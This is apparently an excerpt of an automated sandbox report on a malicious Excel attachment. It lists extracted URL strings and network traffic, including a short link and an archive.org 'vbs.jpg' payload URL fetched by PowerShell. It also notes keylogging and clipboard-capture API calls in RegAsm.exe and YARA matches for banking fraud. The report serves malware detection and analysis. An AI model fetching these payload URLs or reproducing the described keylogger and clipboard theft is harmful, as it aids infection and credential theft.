Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: powershell.exe, 0000000B.00000002.516053834.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.511591510.0000000002261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.518814994.00000000005E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: RegAsm.exe, 00000012.00000002.518576089.000000000037C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/LK
Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://www.msn.com/
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: RegAsm.exe, 0000000F.00000002.521695827.0000000000204000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://contextual.media.net/
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv2AF7.tmp.15.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 0000000D.00000002.511591510.0000000002399000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia803104.us.archive.org
Source: powershell.exe, 0000000D.00000002.510198606.0000000000330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.514548076.0000000005114000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                Source: powershell.exe, 0000000B.00000002.516053834.0000000002603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 0000000F.00000002.522516063.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522490434.0000000002A8E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522503026.0000000002B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: zhort.de.url.4.drString found in binary or memory: https://zhort.de/
                Source: RFQ No. 109078906v.xla.xlsx, FoNVg0.url.4.drString found in binary or memory: https://zhort.de/FoNVg0
                Source: ~DFAEDAA30879C445E4.TMP.0.dr, 9EC30000.0.drString found in binary or memory: https://zhort.de/FoNVg0yX
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000014_2_0040A2B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_004168C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A3E0

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
